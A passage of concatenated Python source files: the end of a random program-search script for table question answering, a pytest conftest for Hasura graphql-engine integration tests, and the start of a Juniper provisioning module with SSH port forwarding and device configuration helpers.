ob, _, _, _ = env.step(action)
if sum(env.rewards) >= 1.0:
return env.de_vocab.lookup(env.mapped_actions, reverse=True)
else:
return None
def run_random_exploration(shard_id):
experiment_dir = get_experiment_dir()
if not tf.gfile.Exists(experiment_dir):
tf.gfile.MkDir(experiment_dir)
if FLAGS.trigger_word_file:
with open(FLAGS.trigger_word_file, 'r') as f:
trigger_dict = json.load(f)
print 'use trigger words in {}'.format(FLAGS.trigger_word_file)
else:
trigger_dict = None
# Load dataset.
train_set = []
with open(FLAGS.train_file_tmpl.format(shard_id), 'r') as f:
for line in f:
example = json.loads(line)
train_set.append(example)
tf.logging.info('{} examples in training set.'.format(len(train_set)))
table_dict = {}
with open(FLAGS.table_file) as f:
for line in f:
table = json.loads(line)
table_dict[table['name']] = table
tf.logging.info('{} tables.'.format(len(table_dict)))
if FLAGS.executor == 'wtq':
score_fn = utils.wtq_score
process_answer_fn = lambda x: x
executor_fn = executor_factory.WikiTableExecutor
elif FLAGS.executor == 'wikisql':
score_fn = utils.wikisql_score
process_answer_fn = utils.wikisql_process_answer
executor_fn = executor_factory.WikiSQLExecutor
else:
raise ValueError('Unknown executor {}'.format(FLAGS.executor))
all_envs = []
t1 = time.time()
for i, example in enumerate(train_set):
if i % 100 == 0:
tf.logging.info('creating environment #{}'.format(i))
kg_info = table_dict[example['context']]
executor = executor_fn(kg_info)
api = executor.get_api()
type_hierarchy = api['type_hierarchy']
func_dict = api['func_dict']
constant_dict = api['constant_dict']
interpreter = computer_factory.LispInterpreter(
type_hierarchy=type_hierarchy,
max_mem=FLAGS.max_n_mem, max_n_exp=FLAGS.max_n_exp, assisted=True)
for v in func_dict.values():
interpreter.add_function(**v)
interpreter.add_constant(
value=kg_info['row_ents'], type='entity_list', name='all_rows')
de_vocab = interpreter.get_vocab()
env = env_factory.QAProgrammingEnv(
data_utils.Vocab([]), de_vocab, question_annotation=example,
answer=process_answer_fn(example['answer']),
constants=constant_dict.values(),
interpreter=interpreter,
constant_value_embedding_fn=lambda x: None,
score_fn=score_fn,
max_cache_size=FLAGS.n_explore_samples * FLAGS.n_epoch * 10,
name=example['id'])
all_envs.append(env)
program_dict = dict([(env.name, []) for env in all_envs])
for i in xrange(1, FLAGS.n_epoch + 1):
tf.logging.info('iteration {}'.format(i))
t1 = time.time()
for env in all_envs:
for _ in xrange(FLAGS.n_explore_samples):
program = random_explore(env, trigger_dict=trigger_dict)
if program is not None:
program_dict[env.name].append(program)
t2 = time.time()
tf.logging.info('{} sec used in iteration {}'.format(t2 - t1, i))
if i % FLAGS.save_every_n == 0:
tf.logging.info('saving programs and cache in iteration {}'.format(i))
t1 = time.time()
with open(os.path.join(
get_experiment_dir(), 'program_shard_{}-{}.json'.format(shard_id, i)), 'w') as f:
program_str_dict = dict([(k, [' '.join(p) for p in v]) for k, v
in program_dict.iteritems()])
json.dump(program_str_dict, f, sort_keys=True, indent=2)
# cache_dict = dict([(env.name, list(env.cache._set)) for env in all_envs])
t2 = time.time()
tf.logging.info(
'{} sec used saving programs and cache in iteration {}'.format(
t2 - t1, i))
n = len(all_envs)
solution_ratio = len([env for env in all_envs if program_dict[env.name]]) * 1.0 / n
tf.logging.info(
'At least one solution found ratio: {}'.format(solution_ratio))
n_programs_per_env = np.array([len(program_dict[env.name]) for env in all_envs])
tf.logging.info(
'number of solutions found per example: max {}, min {}, avg {}, std {}'.format(
n_programs_per_env.max(), n_programs_per_env.min(), n_programs_per_env.mean(),
n_programs_per_env.std()))
# Macro average length.
mean_length = np.mean([np.mean([len(p) for p in program_dict[env.name]]) for env in all_envs
if program_dict[env.name]])
tf.logging.info('macro average program length: {}'.format(
mean_length))
# avg_cache_size = sum([len(env.cache._set) for env in all_envs]) * 1.0 / len(all_envs)
# tf.logging.info('average cache size: {}'.format(
# avg_cache_size))
def collect_programs():
saved_programs = {}
for i in xrange(FLAGS.id_start, FLAGS.id_end):
with open(os.path.join(
get_experiment_dir(),
'program_shard_{}-{}.json'.format(i, FLAGS.n_epoch)), 'r') as f:
program_shard = json.load(f)
saved_programs.update(program_shard)
saved_program_path = os.path.join(get_experiment_dir(), 'saved_programs.json')
with open(saved_program_path, 'w') as f:
json.dump(saved_programs, f)
print 'saved programs are aggregated in {}'.format(saved_program_path)
def main(unused_argv):
ps = []
for idx in xrange(FLAGS.id_start, FLAGS.id_end):
p = multiprocessing.Process(target=run_random_exploration, args=(idx,))
p.start()
ps.append(p)
for p in ps:
p.join()
collect_programs()
if __name__ == '__main__':
tf.app.run()
|
conftest.py
|
import pytest
import time
from context import HGECtx, HGECtxError, ActionsWebhookServer, EvtsWebhookServer, HGECtxGQLServer, GQLWsClient, PytestConf, GraphQLWSClient
import threading
from auth_webhook_server import create_server, stop_server
import random
from datetime import datetime
import sys
import os
from collections import OrderedDict
from validate import assert_response_code
def pytest_addoption(parser):
parser.addoption(
"--hge-urls",
metavar="HGE_URLS",
help="csv list of urls for graphql-engine",
required=False,
nargs='+'
)
parser.addoption(
"--pg-urls", metavar="PG_URLS",
help="csv list of urls for connecting to Postgres directly",
required=False,
nargs='+'
)
parser.addoption(
"--hge-key", metavar="HGE_KEY", help="admin secret key for graphql-engine", required=False
)
parser.addoption(
"--hge-webhook", metavar="HGE_WEBHOOK", help="url for graphql-engine's access control webhook", required=False
)
parser.addoption(
"--test-webhook-insecure", action="store_true",
help="Run Test cases for insecure https webhook"
)
parser.addoption(
"--test-webhook-request-context", action="store_true",
help="Run Test cases for testing webhook request context"
)
parser.addoption(
"--hge-jwt-key-file", metavar="HGE_JWT_KEY_FILE", help="File containing the private key used to encode jwt tokens using RS512 algorithm", required=False
)
parser.addoption(
"--hge-jwt-conf", metavar="HGE_JWT_CONF", help="The JWT conf", required=False
)
parser.addoption(
"--test-cors", action="store_true",
required=False,
help="Run testcases for CORS configuration"
)
parser.addoption(
"--test-ws-init-cookie",
metavar="read|noread",
required=False,
help="Run testcases for testing cookie sending over websockets"
)
parser.addoption(
"--test-metadata-disabled", action="store_true",
help="Run Test cases with metadata queries being disabled"
)
parser.addoption(
"--test-graphql-disabled", action="store_true",
help="Run Test cases with GraphQL queries being disabled"
)
parser.addoption(
"--test-hge-scale-url",
metavar="<url>",
required=False,
help="Run testcases for horizontal scaling"
)
parser.addoption(
"--test-allowlist-queries", action="store_true",
help="Run Test cases with allowlist queries enabled"
)
parser.addoption(
"--test-logging",
action="store_true",
default=False,
required=False,
help="Run testcases for logging"
)
parser.addoption(
"--test-startup-db-calls",
action="store_true",
default=False,
required=False,
help="Run testcases for startup database calls"
)
parser.addoption(
"--test-function-permissions",
action="store_true",
required=False,
help="Run manual function permission tests"
)
parser.addoption(
"--test-streaming-subscriptions",
action="store_true",
default=False,
required=False,
help="Run streaming subscription tests"
)
parser.addoption(
"--test-jwk-url",
action="store_true",
default=False,
required=False,
help="Run testcases for JWK url behaviour"
)
parser.addoption(
"--accept",
action="store_true",
default=False,
required=False,
help="Accept any failing test cases from YAML files as correct, and write the new files out to disk."
)
parser.addoption(
"--skip-schema-teardown",
action="store_true",
default=False,
required=False,
help="""
Skip tearing down the schema/Hasura metadata after tests. This option may result in test failures if the schema
has to change between the list of tests to be run
"""
)
parser.addoption(
"--skip-schema-setup",
action="store_true",
default=False,
required=False,
help="""
Skip setting up schema/Hasura metadata before tests.
This option may result in test failures if the schema has to change between the list of tests to be run
"""
)
parser.addoption(
"--avoid-error-message-checks",
action="store_true",
default=False,
required=False,
help="""
This option when set will ignore disparity in error messages between expected and response outputs.
Used basically in version upgrade/downgrade tests where the error messages may change
"""
)
parser.addoption(
"--collect-upgrade-tests-to-file",
metavar="<path>",
required=False,
help="When used along with collect-only, it will write the list of upgrade tests into the file specified"
)
parser.addoption(
"--test-unauthorized-role",
action="store_true",
help="Run testcases for unauthorized role",
)
parser.addoption(
"--test-no-cookie-and-unauth-role",
action="store_true",
help="Run testcases for no unauthorized role and no cookie jwt header set (cookie auth is set as part of jwt config upon engine startup)",
)
parser.addoption(
"--enable-remote-schema-permissions",
action="store_true",
default=False,
help="Flag to indicate if the graphql-engine has enabled remote schema permissions",
)
parser.addoption(
"--redis-url",
metavar="REDIS_URL",
help="redis url for cache server",
default=False
)
parser.addoption(
"--backend",
help="run integration tests using a particular backend",
default="postgres"
)
parser.addoption(
"--pro-tests",
action="store_true",
default=False,
help="Flag to specify if the pro tests are to be run"
)
parser.addoption(
"--test-developer-api-enabled", action="store_true",
help="Run Test cases with the Developer API Enabled",
default=False
)
parser.addoption(
"--test-auth-webhook-header",
action="store_true",
default=False,
required=False,
help="Run testcases for auth webhook header forwarding"
)
parser.addoption(
"--test-read-only-source",
action="store_true",
default=False,
required=False,
help="Run testcases with a read-only database source"
)
#By default,
#1) Set default parallelism to one
#2) Set test grouping to by filename (--dist=loadfile)
def pytest_cmdline_preparse(config, args):
worker = os.environ.get('PYTEST_XDIST_WORKER')
if 'xdist' in sys.modules and not worker: # pytest-xdist plugin
num = 1
args[:] = ["-n" + str(num),"--dist=loadfile"] + args
def pytest_configure(config):
# Pytest has removed the global pytest.config
# As a solution we are going to store it in PytestConf.config
PytestConf.config = config
if is_help_option_present(config):
return
if is_master(config):
if not config.getoption('--hge-urls'):
print("hge-urls should be specified")
if not config.getoption('--pg-urls'):
print("pg-urls should be specified")
config.hge_url_list = config.getoption('--hge-urls')
config.pg_url_list = config.getoption('--pg-urls')
config.hge_ctx_gql_server = HGECtxGQLServer(config.hge_url_list)
if config.getoption('-n', default=None):
xdist_threads = config.getoption('-n')
assert xdist_threads <= len(config.hge_url_list), "Not enough hge_urls specified, Required " + str(xdist_threads) + ", got " + str(len(config.hge_url_list))
assert xdist_threads <= len(config.pg_url_list), "Not enough pg_urls specified, Required " + str(xdist_threads) + ", got " + str(len(config.pg_url_list))
random.seed(datetime.now())
@pytest.hookimpl()
def pytest_report_collectionfinish(config, startdir, items):
"""
Collect server upgrade tests to the given file
"""
tests_file = config.getoption('--collect-upgrade-tests-to-file')
sep=''
tests=OrderedDict()
if tests_file:
def is_upgrade_test(item):
# Check if allow_server_upgrade_tests marker are present
# skip_server_upgrade_tests marker is not present
return item.get_closest_marker('allow_server_upgrade_test') \
and not item.get_closest_marker('skip_server_upgrade_test')
with open(tests_file,'w') as f:
upgrade_items = filter(is_upgrade_test, items)
for item in upgrade_items:
# This test should be run separately,
# since its schema setup has function scope
if 'per_method_tests_db_state' in item.fixturenames:
tests[item.nodeid] = True
elif any([ (x in item.fixturenames)
for x in
[ 'per_class_tests_db_state',
'per_class_db_schema_for_mutation_tests'
]
]):
# For this test, schema setup has class scope
# We can run a class of these tests at a time
tests[item.parent.nodeid] = True
# Assume tests can only be run separately
else:
tests[item.nodeid] = True
for test in tests.keys():
f.write(test + '\n')
return ''
@pytest.hookimpl(optionalhook=True)
def pytest_configure_node(node):
if is_help_option_present(node.config):
return
# Pytest has removed the global pytest.config
node.workerinput["hge-url"] = node.config.hge_url_list.pop()
node.workerinput["pg-url"] = node.config.pg_url_list.pop()
def pytest_unconfigure(config):
if is_help_option_present(config):
return
config.hge_ctx_gql_server.teardown()
@pytest.fixture(scope='module')
def hge_ctx(request):
config = request.config
print("create hge_ctx")
if is_master(config):
hge_url = config.hge_url_list[0]
else:
hge_url = config.workerinput["hge-url"]
if is_master(config):
pg_url = config.pg_url_list[0]
else:
pg_url = config.workerinput["pg-url"]
try:
hge_ctx = HGECtx(hge_url, pg_url, config)
except HGECtxError as e:
assert False, "Error from hge_ctx: " + str(e)
# TODO this breaks things (https://github.com/pytest-dev/pytest-xdist/issues/86)
# so at least make sure the real error gets printed (above)
pytest.exit(str(e))
yield hge_ctx # provide the fixture value
print("teardown hge_ctx")
hge_ctx.teardown()
# TODO why do we sleep here?
time.sleep(1)
@pytest.fixture(scope='class')
def evts_webhook(request):
webhook_httpd = EvtsWebhookServer(server_address=('127.0.0.1', 5592))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
@pytest.fixture(scope='module')
def actions_fixture(hge_ctx):
if hge_ctx.is_default_backend:
pg_version = hge_ctx.pg_version
if pg_version < 100000: # version less than 10.0
pytest.skip('Actions are not supported on Postgres version < 10')
# Start actions' webhook server
webhook_httpd = ActionsWebhookServer(hge_ctx, server_address=('127.0.0.1', 5593))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
use_action_fixtures = pytest.mark.usefixtures(
"actions_fixture",
'per_class_db_schema_for_mutation_tests',
'per_method_db_data_for_mutation_tests'
)
@pytest.fixture(scope='class')
def functions_permissions_fixtures(hge_ctx):
if not hge_ctx.function_permissions:
pytest.skip('These tests are meant to be run with --test-function-permissions set')
return
use_function_permission_fixtures = pytest.mark.usefixtures(
'per_class_db_schema_for_mutation_tests',
'per_method_db_data_for_mutation_tests',
'functions_permissions_fixtures'
)
@pytest.fixture(scope='class')
def streaming_subscriptions_fixtures(hge_ctx):
if not hge_ctx.streaming_subscriptions:
pytest.skip('These tests are meant to be run with --test-streaming-subscriptions set with pytest')
return
@pytest.fixture(scope='class')
def pro_tests_fixtures(hge_ctx):
if not hge_ctx.pro_tests:
pytest.skip('These tests are meant to be run with --pro-tests set')
return
@pytest.fixture(scope='class')
def scheduled_triggers_evts_webhook(request):
webhook_httpd = EvtsWebhookServer(server_address=('127.0.0.1', 5594))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
@pytest.fixture(scope='class')
def gql_server(request, hge_ctx):
server = HGECtxGQLServer(request.config.getoption('--pg-urls'), 5991)
yield server
server.teardown()
@pytest.fixture(scope='class')
def ws_client(request, hge_ctx):
"""
This fixture provides an Apollo GraphQL websockets client
"""
client = GQLWsClient(hge_ctx, '/v1/graphql')
time.sleep(0.1)
yield client
client.teardown()
@pytest.fixture(scope='class')
def ws_client_graphql_ws(request, hge_ctx):
"""
This fixture provides an GraphQL-WS client
"""
client = GraphQLWSClient(hge_ctx, '/v1/graphql')
time.sleep(0.1)
yield client
client.teardown()
@pytest.fixture(scope='class')
def per_class_tests_db_state(request, hge_ctx):
"""
Set up the database state for select queries.
Has a class level scope, since select queries does not change database state
Expects either `dir()` method which provides the directory
with `setup.yaml` and `teardown.yaml` files
Or class variables `setup_files` and `teardown_files` that provides
the list of setup and teardown files respectively.
By default, for a postgres backend the setup and teardown is done via
the `/v1/query` endpoint, to setup using the `/v1/metadata` (metadata setup)
and `/v2/query` (DB setup), set the `setup_metadata_api_version` to "v2"
"""
yield from db_state_context(request, hge_ctx)
@pytest.fixture(scope='function')
def per_method_tests_db_state(request, hge_ctx):
"""
This fixture sets up the database state for metadata operations
Has a function level scope, since metadata operations may change both the schema and data
Class method/variable requirements are similar to that of per_class_tests_db_state fixture
"""
yield from db_state_context(request, hge_ctx)
@pytest.fixture(scope='class')
def per_class_db_schema_for_mutation_tests(request, hge_ctx):
"""
This fixture sets up the database schema for mutations.
It has a class level scope, since mutations does not change schema.
Expects either `dir()` class method which provides the directory with `schema_setup.yaml` and `schema_teardown.yaml` files,
or variables `schema_setup_files` and `schema_teardown_files`
that provides the list of setup and teardown files respectively
"""
# setting the default metadata API version to v1
setup_metadata_api_version = getattr(request.cls, 'setup_metadata_api_version',"v1")
(setup, teardown, schema_setup, schema_teardown, pre_setup, post_teardown) = [
hge_ctx.backend_suffix(filename) + ".yaml"
for filename in ['setup', 'teardown', 'schema_setup', 'schema_teardown', 'pre_setup', 'post_teardown']
]
# only lookup files relevant to the tests being run.
# defaults to postgres file lookup
check_file_exists = hge_ctx.backend == backend
if hge_ctx.is_default_backend:
if setup_metadata_api_version == "v1":
db_context = db_context_with_schema_common(
request, hge_ctx, 'schema_setup_files', 'schema_setup.yaml', 'schema_teardown_files', 'schema_teardown.yaml', check_file_exists
)
else:
db_context = db_context_with_schema_common_new (
request, hge_ctx, 'schema_setup_files', setup, 'schema_teardown_files', teardown,
schema_setup, schema_teardown, pre_setup, post_teardown, check_file_exists
)
else:
db_context = db_context_with_schema_common_new (
request, hge_ctx, 'schema_setup_files', setup, 'schema_teardown_files', teardown,
schema_setup, schema_teardown, pre_setup, post_teardown, check_file_exists
)
yield from db_context
@pytest.fixture(scope='function')
def per_method_db_data_for_mutation_tests(request, hge_ctx, per_class_db_schema_for_mutation_tests):
"""
This fixture sets up the data for mutations.
Has a function level scope, since mutations may change data.
Having just the setup file(s), or the teardown file(s) is allowed.
Expects either `dir()` class method which provides the directory with `values_setup.yaml` and / or `values_teardown.yaml` files.
The class may provide `values_setup_files` variables which contains the list of data setup files,
Or the `values_teardown_files` variable which provides the list of data teardown files.
"""
# Non-default (Postgres) backend tests expect separate setup and schema_setup
# files for v1/metadata and v2/query requests, respectively.
(values_setup, values_teardown) = [
hge_ctx.backend_suffix(filename) + ".yaml"
for filename in ['values_setup', 'values_teardown']
]
yield from db_context_common(
request, hge_ctx, 'values_setup_files', values_setup,
'values_teardown_files', values_teardown,
False, False, False
)
@pytest.fixture(scope='function')
def backend():
"This fixture provides a default `backend` value for the `per_backend_tests` fixture"
return 'postgres'
@pytest.fixture(scope='function', autouse=True)
def per_backend_tests(hge_ctx, backend):
"""
This fixture ignores backend-specific tests unless the relevant --backend flag has been passed.
"""
# Currently, we default all tests to run on Postgres with or without a --backend flag.
# As our test suite develops, we may consider running backend-agnostic tests on all
# backends, unless a specific `--backend` flag is passed.
if not hge_ctx.backend == backend:
pytest.skip(
'Skipping test. Add --backend ' + backend + ' to run backend-specific tests'
)
return
def db_state_context(request, hge_ctx):
# Non-default (Postgres) backend tests expect separate setup and schema_setup
# files for v1/metadata and v2/query requests, respectively.
(setup, teardown, schema_setup, schema_teardown, pre_setup, post_teardown) = [
hge_ctx.backend_suffix(filename) + ".yaml"
for filename in ['setup', 'teardown', 'schema_setup', 'schema_teardown', 'pre_setup', 'post_teardown']
]
# only lookup files relevant to the tests being run.
# defaults to postgres file lookup
check_file_exists = hge_ctx.backend == backend
# setting the default metadata API version to v1
setup_metadata_api_version = getattr(request.cls, 'setup_metadata_api_version',"v1")
if hge_ctx.is_default_backend:
if setup_metadata_api_version == "v1":
# setup the metadata and DB schema using the `/v1/query` endpoint
db_context = db_context_with_schema_common(
request, hge_ctx, 'setup_files', 'setup.yaml', 'teardown_files',
'teardown.yaml', check_file_exists )
elif setup_metadata_api_version == "v2":
# setup the metadata using the "/v1/metadata" and the DB schema using the `/v2/query` endpoints
db_context = db_context_with_schema_common_new (
request, hge_ctx, 'setup_files', setup, 'teardown_files',
teardown, schema_setup, schema_teardown, pre_setup, post_teardown, check_file_exists
)
else:
# setup the metadata using the "/v1/metadata" and the DB schema using the `/v2/query` endpoints
db_context = db_context_with_schema_common_new (
request, hge_ctx, 'setup_files', setup, 'teardown_files',
teardown, schema_setup, schema_teardown, pre_setup, post_teardown, check_file_exists
)
yield from db_context
def db_state_context_new(
request, hge_ctx, setup='setup.yaml', teardown='teardown.yaml',
schema_setup='schema_setup.yaml', schema_teardown='schema_teardown.yaml',
pre_setup='pre_setup.yaml', post_teardown='post_teardown.yaml'):
yield from db_context_with_schema_common_new (
request, hge_ctx, 'setup_files', setup, 'teardown_files',
teardown, schema_setup, schema_teardown, pre_setup, post_teardown, True
)
def db_context_with_schema_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file, check_file_exists=True):
(skip_setup, skip_teardown) = [
request.config.getoption('--' + x)
for x in ['skip-schema-setup', 'skip-schema-teardown']
]
yield from db_context_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file,
check_file_exists, skip_setup, skip_teardown
)
def db_context_with_schema_common_new (
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file, setup_sql_file, teardown_sql_file, pre_setup_file, post_teardown_file, check_file_exists=True):
(skip_setup, skip_teardown) = [
request.config.getoption('--' + x)
for x in ['skip-schema-setup', 'skip-schema-teardown']
]
yield from db_context_common_new (
request, hge_ctx, setup_files_attr, setup_default_file, setup_sql_file,
teardown_files_attr, teardown_default_file, teardown_sql_file,
pre_setup_file, post_teardown_file,
check_file_exists, skip_setup, skip_teardown
)
def db_context_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file,
check_file_exists=True, skip_setup=True, skip_teardown=True ):
def get_files(attr, default_file):
files = getattr(request.cls, attr, None)
if not files:
files = os.path.join(request.cls.dir(), default_file)
return files
setup = get_files(setup_files_attr, setup_default_file)
teardown = get_files(teardown_files_attr, teardown_default_file)
if hge_ctx.is_default_backend:
yield from setup_and_teardown_v1q(request, hge_ctx, setup, teardown, check_file_exists, skip_setup, skip_teardown)
else:
yield from setup_and_teardown_v2q(request, hge_ctx, setup, teardown, check_file_exists, skip_setup, skip_teardown)
def db_context_common_new(
request, hge_ctx, setup_files_attr, setup_default_file,
setup_default_sql_file,
teardown_files_attr, teardown_default_file, teardown_default_sql_file,
pre_setup_file, post_teardown_file,
check_file_exists=True, skip_setup=True, skip_teardown=True ):
def get_files(attr, default_file):
files = getattr(request.cls, attr, None)
if not files:
files = os.path.join(request.cls.dir(), default_file)
return files
setup = get_files(setup_files_attr, setup_default_file)
teardown = get_files(teardown_files_attr, teardown_default_file)
setup_default_sql_file = os.path.join(request.cls.dir(), setup_default_sql_file)
teardown_default_sql_file = os.path.join(request.cls.dir(), teardown_default_sql_file)
pre_setup_default_file = os.path.join(request.cls.dir(), pre_setup_file)
post_teardown_default_file = os.path.join(request.cls.dir(), post_teardown_file)
yield from setup_and_teardown( request, hge_ctx, setup, teardown,
setup_default_sql_file, teardown_default_sql_file, pre_setup_default_file, post_teardown_default_file,
check_file_exists, skip_setup, skip_teardown)
def setup_and_teardown_v1q(request, hge_ctx, setup_files, teardown_files, check_file_exists=True, skip_setup=False, skip_teardown=False):
def assert_file_exists(f):
assert os.path.isfile(f), 'Could not find file ' + f
if check_file_exists:
for o in [setup_files, teardown_files]:
run_on_elem_or_list(assert_file_exists, o)
def v1q_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v1q_f(f)
assert st_code == 200, resp
if not skip_setup:
run_on_elem_or_list(v1q_f, setup_files)
yield
# Teardown anyway if any of the tests have failed
if request.session.testsfailed > 0 or not skip_teardown:
run_on_elem_or_list(v1q_f, teardown_files)
def setup_and_teardown_v2q(request, hge_ctx, setup_files, teardown_files, check_file_exists=True, skip_setup=False, skip_teardown=False):
def assert_file_exists(f):
assert os.path.isfile(f), 'Could not find file ' + f
if check_file_exists:
for o in [setup_files, teardown_files]:
run_on_elem_or_list(assert_file_exists, o)
def v2q_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v2q_f(f)
assert st_code == 200, resp
if not skip_setup:
run_on_elem_or_list(v2q_f, setup_files)
yield
# Teardown anyway if any of the tests have failed
if request.session.testsfailed > 0 or not skip_teardown:
run_on_elem_or_list(v2q_f, teardown_files)
def setup_and_teardown(request, hge_ctx, setup_files, teardown_files,
sql_schema_setup_file,sql_schema_teardown_file,
pre_setup_file, post_teardown_file,
check_file_exists=True, skip_setup=False, skip_teardown=False):
def assert_file_exists(f):
assert os.path.isfile(f), 'Could not find file ' + f
if check_file_exists:
for o in [setup_files, teardown_files, sql_schema_setup_file, sql_schema_teardown_file]:
run_on_elem_or_list(assert_file_exists, o)
def v2q_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v2q_f(f)
if st_code != 200:
run_on_elem_or_list(pre_post_metadataq_f, post_teardown_file)
assert_response_code('/v2/query', f, st_code, 200, resp)
def metadataq_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v1metadataq_f(f)
if st_code != 200:
# drop the sql setup, if the metadata calls fail
run_on_elem_or_list(v2q_f, sql_schema_teardown_file)
run_on_elem_or_list(pre_post_metadataq_f, post_teardown_file)
assert_response_code('/v1/metadata', f, st_code, 200, resp)
def pre_post_metadataq_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v1metadataq_f(f)
assert_response_code('/v1/metadata', f, st_code, 200, resp)
if not skip_setup:
run_on_elem_or_list(pre_post_metadataq_f, pre_setup_file)
run_on_elem_or_list(v2q_f, sql_schema_setup_file)
run_on_elem_or_list(metadataq_f, setup_files)
yield
# Teardown anyway if any of the tests have failed
if request.session.testsfailed > 0 or not skip_teardown:
run_on_elem_or_list(metadataq_f, teardown_files)
run_on_elem_or_list(v2q_f, sql_schema_teardown_file)
run_on_elem_or_list(pre_post_metadataq_f, post_teardown_file)
def run_on_elem_or_list(f, x):
if isinstance(x, str):
return [f(x)]
elif isinstance(x, list):
return [f(e) for e in x]
def is_help_option_present(config):
return any([
config.getoption(x)
for x in ['--fixtures','--help', '--collect-only']
])
def is_master(config):
"""True if the code running the given pytest.config object is running in a xdist master
node or not running xdist at all.
"""
return not hasattr(config, 'workerinput')
|
tasktools.py
|
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER
# Copyright (c) 2018 Juniper Networks, Inc.
# All rights reserved.
# Use is subject to license terms.
#
# Author: cklewar
import datetime
import os
import select
import socket
import threading
import lib.constants as c
from jnpr.junos.exception import *
from paramiko.ssh_exception import SSHException
from lib.logmsg import LogTaskTools as logmsg
from lib.tools import Tools
from pathlib2 import Path
class SSHPortForward(object):
def __init__(self, sample_device=None, grp_cfg=None, event=None, cancel_chan=None):
self.logger = c.logger
self.sample_device = sample_device
self.grp_cfg = grp_cfg
self.event = event
self.cancel_chan = cancel_chan
self.logger.info(Tools.create_log_msg(logmsg.SSHFWD, sample_device.deviceSerial,
logmsg.SSHFWD_INIT.format(self.sample_device.deviceIP,
grp_cfg.TASKS.Provision.Cert.LocalFwdPort,
grp_cfg.TASKS.Provision.Cert.RemoteFwdHost,
grp_cfg.TASKS.Provision.Cert.RemoteFwdHostPort)))
def init_port_fwd(self):
if self.sample_device.deviceConnection.connected:
self.reverse_forward_tunnel(int(self.grp_cfg.TASKS.Provision.Cert.LocalFwdPort),
self.grp_cfg.TASKS.Provision.Cert.RemoteFwdHost,
int(self.grp_cfg.TASKS.Provision.Cert.RemoteFwdHostPort),
self.sample_device.deviceConnection._conn._session.transport, self.event,
self.cancel_chan)
else:
self.logger.info(
Tools.create_log_msg(logmsg.SSHFWD, self.sample_device.deviceSerial, logmsg.SSHFWD_CONN_NOK))
return False
def reverse_forward_tunnel(self, server_port, remote_host, remote_port, transport, event, cancel_chan):
try:
transport.request_port_forward(address='', port=server_port, )
except SSHException as err:
self.logger.info(Tools.create_log_msg(logmsg.SSHFWD, self.sample_device.deviceSerial,
logmsg.SSHFWD_INIT_FAILURE.format(err.message)))
return False, logmsg.SSHFWD_INIT_FAILURE.format(err.message)
event.set()
while True:
chan = transport.accept(1)
if cancel_chan.is_cancelled:
break
elif chan is None:
continue
thr = threading.Thread(target=self.handler, args=(chan, remote_host, remote_port,))
thr.setDaemon(True)
thr.start()
def handler(self, chan, host, port):
sock = socket.socket()
try:
sock.connect((host, port))
except Exception as e:
self.logger.info(Tools.create_log_msg(logmsg.SSHFWD, self.sample_device.deviceSerial,
logmsg.SSHFWD_REQ_FAILED.format(host, port, e)))
return
self.logger.info(Tools.create_log_msg(logmsg.SSHFWD, self.sample_device.deviceSerial,
logmsg.SSHFWD_REQ_CONNECTED.format(chan.origin_addr, chan.getpeername(),
(host, port))))
while True:
r, w, x = select.select([sock, chan], [], [])
if sock in r:
data = sock.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
sock.send(data)
chan.close()
sock.close()
self.logger.info(Tools.create_log_msg(logmsg.SSHFWD, self.sample_device.deviceSerial,
logmsg.SSHFWD_REQ_CLOSED.format(chan.origin_addr)))
class ChannelCancellation(object):
def __init__(self):
self.is_cancelled = False
def cancel(self):
self.is_cancelled = True
class Configuration:
def __init__(self):
self.logger = c.logger
def prepare_device_config(self, sample_device=None):
version = sample_device.softwareVersion
now = datetime.datetime.now().strftime('%Y-%m-%d-%H%M')
grp_cfg = Tools.create_config_view(config_type=c.CONFIG_TYPE_GROUP, stream=sample_device.deviceGroupData)
if c.SERVICEPLUGIN_OSSH in sample_device.deviceServicePlugin:
sample_device.deviceConfigData['device']['ossh_secret'] = sample_device.deviceConfigData['device'][
'ossh_secret']
sample_device.deviceConfigData['device']['ossh_ip'] = c.conf.SERVICES.Ossh.ServiceBindAddress
sample_device.deviceConfigData['device']['ossh_port'] = c.conf.SERVICES.Ossh.ServiceListenPort
if sample_device.deviceConfigData:
heading = "## Last changed: " + now + "\n"
heading += "version " + version + ";"
sample_device.deviceConfigData['heading'] = heading
status, data = Tools.get_config(lookup_type=c.CONFIG_LOOKUP_TYPE_GET_TEMPLATE,
sample_device=sample_device)
if status:
config = data.render(sample_device.deviceConfigData)
sample_device.deviceConfiguration = config
_device_config_file = '{0}-{1}.conf'.format(sample_device.deviceSerial, now)
target = open(grp_cfg.TASKS.Provision.Configuration.ConfigFileHistory + _device_config_file, 'w')
target.write(sample_device.deviceConfiguration)
target.close()
return {'status': True, 'sample_device': sample_device, 'configfilename': _device_config_file}
else:
return {'status': False, 'sample_device': sample_device, 'configfilename': data}
else:
self.logger.info(Tools.create_log_msg(logmsg.CONF_DEV_CFG, sample_device.deviceSerial,
logmsg.CONF_DEV_CFG_DEV_DATA_ERROR))
return None
def prepare_vnf_boostrap_config(self, serialnumber=None, grp_cfg=None, vnf_type=None):
now = datetime.datetime.now().strftime('%Y-%m-%d-%H%M')
status, data = Tools.get_config(lookup_type=c.CONFIG_LOOKUP_TYPE_GET_DEVICE_CFG,
serialnumber=None, deviceOsshId=serialnumber)
